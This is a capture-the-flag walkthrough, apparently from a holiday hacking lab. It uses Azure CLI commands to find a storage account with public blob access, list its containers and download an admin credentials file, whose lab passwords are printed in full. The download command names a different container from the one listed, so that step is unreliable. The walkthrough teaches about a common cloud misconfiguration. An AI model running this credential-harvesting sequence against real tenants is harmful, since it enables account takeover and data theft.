Blob Storage Challenge in the Neighborhood

  Challenge Progession:
Act I
Difficulty:
  Location:
Dosis Neighborhood
Storage Secrets
Uncover Storage Secrets

This challenge is located on the south side of the frozen pond in the Dosis Neighborhood. Locate the goose Grace to begin. You will be dropped into an Azure environment with the Azure CLI tool to use. This challenge is more of a tutorial and will walk you through each of the steps of exposing this blob storage issue. If you get stuck or want to research more on the AZ CLI tool. Check out the help documentation.

AZ CLI Usage

This first step is to run the help command. The help command is piped through to the less tool so we can read the full output. Without less, the output would exceed the window buffer and we wouldn't be able to read everything.

neighbor@f3357a568927:~$ az help | less
This is a good time to get acquainted with the az cli environment. Read over each of the options and you start to get a feel for what is possible. The terminal tells us that the environment is already configured with credentials, so we don't need to worry about API keys or anything for this challenge. Step 2 is to print the account details of our tenant.
neighbor@f3357a568927:~$ az account show | less
Step 3 is to show the storage accounts for the tenant.
neighbor@f3357a568927:~$ az storage account list | less
The terminal indicates that there is a red flag in the output that should alert us to an issue. One of the accounts seems to have public blob access enabled. The suspicious account is below. I have removed the other accounts that do not have public blob access enabled.
{
    "id": "/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/theneighborhood-rg1/providers/Microsoft.Storage/storageAccounts/neighborhood2",
    "kind": "StorageV2",
    "location": "eastus2",
    "name": "neighborhood2",
    "properties": {
      "accessTier": "Cool",
      "allowBlobPublicAccess": true,
      "encryption": {
        "keySource": "Microsoft.Storage",
        "services": {
          "blob": {
            "enabled": false
          }
        }
      },
      "minimumTlsVersion": "TLS1_0"
    },
    "resourceGroup": "theneighborhood-rg1",
    "sku": {
      "name": "Standard_GRS"
    },
    "tags": {
      "owner": "Admin"
    }
  }
The suspicious account name is "neighborhood2" so we can us the az cli to show just that account.
az storage account show --name neighborhood2 | less
The next thing to do is to show all the containers related to this account:
neighbor@f3357a568927:~$ az storage container list --account-name neighborhood2
[
  {
    "name": "public",
    "properties": {
      "lastModified": "2024-01-15T09:00:00Z",
      "publicAccess": "Blob"
    }
  },
  {
    "name": "private",
    "properties": {
      "lastModified": "2024-02-05T11:12:00Z",
      "publicAccess": null
    }
  }
]
There is a container here named "public" that has public access "Blob". We can use the az cli to list the files in this container!
neighbor@f3357a568927:~$ az storage blob list --account-name neighborhood2 --container-name public
[
  {
    "name": "refrigerator_inventory.pdf",
    "properties": {
      "contentLength": 45678,
      "contentType": "application/pdf",
      "metadata": {
        "created_by": "NeighborhoodWatch",
        "document_type": "inventory",
        "last_updated": "2024-12-15"
      }
    }
  },
  {
    "name": "admin_credentials.txt",
    "properties": {
      "contentLength": 1024,
      "contentType": "text/plain",
      "metadata": {
        "note": "admins only"
      }
    }
  },
  {
    "name": "network_config.json",
    "properties": {
      "contentLength": 2048,
      "contentType": "application/json",
      "metadata": {
        "encrypted": "false",
        "environment": "prod"
      }
    }
  }
]
There are 3 files in here. One of them seems very sensitive: admin_credentials.txt. We can use the az cli to download this file.
az storage blob download --account-name neighborhood2 --container-name private --name 'admin_credentials.txt' --file /dev/stdout | less
Note that this command pipes the contents of the file to standard output:
# You have discovered an Azure Storage account with "allowBlobPublicAccess": true.
# This misconfiguration allows ANYONE on the internet to view and download files
# from the blob container without authentication.

# Public blob access is highly insecure when sensitive data (like admin credentials)
# is stored in these containers. Always disable public access unless absolutely required.

Azure Portal Credentials
User: azureadmin
Pass: AzUR3!P@ssw0rd#2025

Windows Server Credentials
User: administrator
Pass: W1nD0ws$Srv!@42

SQL Server Credentials
User: sa
Pass: SqL!P@55#2025$

Active Directory Domain Admin
User: corp\administrator
Pass: D0m@in#Adm!n$765

Exchange Admin Credentials
User: exchangeadmin
Pass: Exch@ng3!M@il#432

VMware vSphere Credentials
User: vsphereadmin
Pass: VMW@r3#Clu$ter!99

Network Switch Credentials
User: netadmin
Pass: N3t!Sw!tch$C0nfig#

Firewall Admin Credentials
User: fwadmin
Pass: F1r3W@ll#S3cur3!77

Backup Server Credentials
User: backupadmin
Pass: B@ckUp!Srv#2025$

Monitoring System Admin
User: monitoradmin
Pass: M0n!t0r#Sys$P@ss!

SharePoint Admin Credentials
User: spadmin
Pass: Sh@r3P0!nt#Adm!n2025

Git Server Admin
User: gitadmin
Pass: G1t#Srv!Rep0$C0de
We successfully exfiltrated the sensitive file! Objective complete. Just type finish in the terminal to complete the challenge.
Challenge Complete